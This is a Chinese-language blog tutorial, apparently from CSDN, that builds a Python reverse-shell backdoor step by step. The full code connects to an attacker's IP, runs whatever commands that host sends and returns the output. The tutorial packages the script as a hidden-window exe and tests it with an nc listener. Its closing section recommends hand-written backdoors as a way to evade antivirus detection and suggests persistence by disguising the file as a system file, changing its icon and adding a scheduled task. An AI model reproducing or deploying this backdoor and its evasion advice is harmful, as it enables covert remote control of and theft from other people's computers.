使用Python制作一个简易的远控终端

远控终端的本质

1、服务端(攻击者)传输消息 ----> socket连接 ----> 客户端(被攻击者)接收消息

2、客户端执行消息内容(即执行服务端传回来的命令)

3、客户端传输执行结果 ----> socket连接 ----> 服务端显示命令执行结果

python制作简易的远控

1、环境

环境：PyCharm 2021.1.1 x64 + python3.8

2、新建项目

打开pycharm，直接新建一个纯python项目。

将main.py文件中原有的代码全部清空。

3、编写程序

(1)导入需要使用的包

# 导入所需要的包
import os
from socket import *

(2)创建main并配置socket套接字信息

#导入所需要的包
......

if __name__ == '__main__':
   # 1、服务端IP地址
   IP = "192.168.6.142"
   # 2、服务端监听的端口PORT
   PORT = 9999
   # 3、socket套接字
   socket_info = (IP, PORT)

(3)创建连接方法

#导入所需要的包
......

def remote_control(info):
   # 初始化socket连接
   skt = socket(AF_INET, SOCK_STREAM)
   skt.connect(info)
   # 获得客户端角色，便于服务端执行下一步操作
   host = os.popen("whoami").read().strip()
   # 将客户端角色在每次输入命令的都显示，美化格式
   tips = f"$({host}) "
   skt.send(tips.encode())

if __name__ == '__main__':
   ......
# 4、连接
   remote_control(socket_info)

(4)接收服务端传入的数据(即命令)

# 导入所需要的包
......

def remote_control(info):
   # 初始化socket连接
   ......
   skt.send(tips.encode())

# 建立持续连接
   while True:
       # 接收服务端传入的数据(即命令)，以1024个bit为一个单位
       data = skt.recv(1024)
       # 将接收的数据进行utf-8解码，并将左右空格去除
       command = data.decode('utf-8').strip()
       # 如果数据为exit，代表服务端想要断开连接，直接退出程序
       if command == 'exit':
           skt.send("exit\n".encode())
           exit(0)

if __name__ == '__main__':
   ......

(5)执行服务端传入的命令并将结果返回给服务端

# 导入所需要的包
......

def remote_control(info):
   # 初始化socket连接
   ......
   skt.send(tips.encode())
   # 建立持续连接
   while True:
       # 接收服务端传入的数据(即命令)，以1024个bit为一个单位
       ......
       if command == 'exit':
           ......
       # 如果数据不为exit，执行数据的内容，即执行服务端传回来的命令，并将执行结果存放在result中
       result = os.popen(command).read()
       # 将命令执行的结果返回给服务端
       skt.send((result + tips).encode())
   # 关闭socket连接
   skt.close()

if __name__ == '__main__':
   ......

代码编写完成！

(6)测试远控终端的可用性

打开一台kali虚拟机(IP为192.168.6.142)作为服务端，使用nc监听9999端口。

连接成功，远控终端制作完成！

4、将python文件打包成exe文件

(1)pip工具安装Pyinstaller模块

Win+R打开运行 --> 输入cmd打开命令窗口

pip install Pyinstaller

(2)切换命令行的路径到需要打包的Python源文件的文件夹路径下

cd 文件路径

(3)打包python文件为exe文件

Pyinstaller -F -w 文件名.py

打包成功！

打包完成后，在要打包文件的同级目录下会新增一个dist文件夹，exe文件就在dist文件夹中。

(4)测试exe文件的可用性

kali服务端监听端口。

点击运行生成的exe文件。

连接成功！python制作远程控制终端完成！

制作远控终端的意义

本篇文章我们研究了python如何制作一个简易的远控终端，上篇我的文章研究了Java如何制作一个简易的远控终端。其实，我们制作的这个远控终端就是一个后门程序。那么大家就想了，我们的CS跟MSF都可以生成后门程序，为什么我们还要自己制作呢？

这是因为，我们不仅可以通过自己制作了解远控程序的原理。而且，由于CS跟MSF生成的后门程序特征比较明显，很多杀毒软件都会杀掉，即使没有杀掉，两三天以后也可能被杀软杀掉，不能做到一个持续化的权限获取，也就是权限维持。而我们自己制作后门程序，是我们自己写的，并没有被公开，杀软就匹配不到我们的特征值，这样杀软就不会杀掉我们的后门程序。如果我们再将我们的后门名称改为系统文件的名称，再改变图标，把后门程序添加到计划任务中，这样我们就可以做到一个很好的一个权限维持。

附完整代码

# 导入所需要的包
import os
from socket import *

def remote_control(info):
   # 初始化socket连接
   skt = socket(AF_INET, SOCK_STREAM)
   skt.connect(info)
   # 获得客户端角色，便于服务端执行下一步操作
   host = os.popen("whoami").read().strip()
   # 将客户端角色在每次输入命令的都显示，美化格式
   tips = f"$({host}) "
   skt.send(tips.encode())
   # 建立持续连接
   while True:
       # 接收服务端传入的数据(即命令)，以1024个bit为一个单位
       data = skt.recv(1024)
       # 将接收的数据进行utf-8解码，并将左右空格去除
       command = data.decode('utf-8').strip()
       # 如果数据为exit，代表服务端想要断开连接，直接退出程序
       if command == 'exit':
           skt.send("exit\n".encode())
           exit(0)
       # 如果数据不为exit，执行数据的内容，即执行服务端传回来的命令，并将执行结果存放在result中
       result = os.popen(command).read()
       # 将命令执行的结果返回给服务端
       skt.send((result + tips).encode())
   # 关闭socket连接
   skt.close()

if __name__ == '__main__':
   # 1、服务端IP地址
   IP = "192.168.6.142"
   # 2、服务端监听的端口PORT
   PORT = 9999
   # 3、socket套接字
   socket_info = (IP, PORT)
   # 4、连接
   remote_control(socket_info)

来源：https://blog.csdn.net/weixin_52635170/article/details/129796414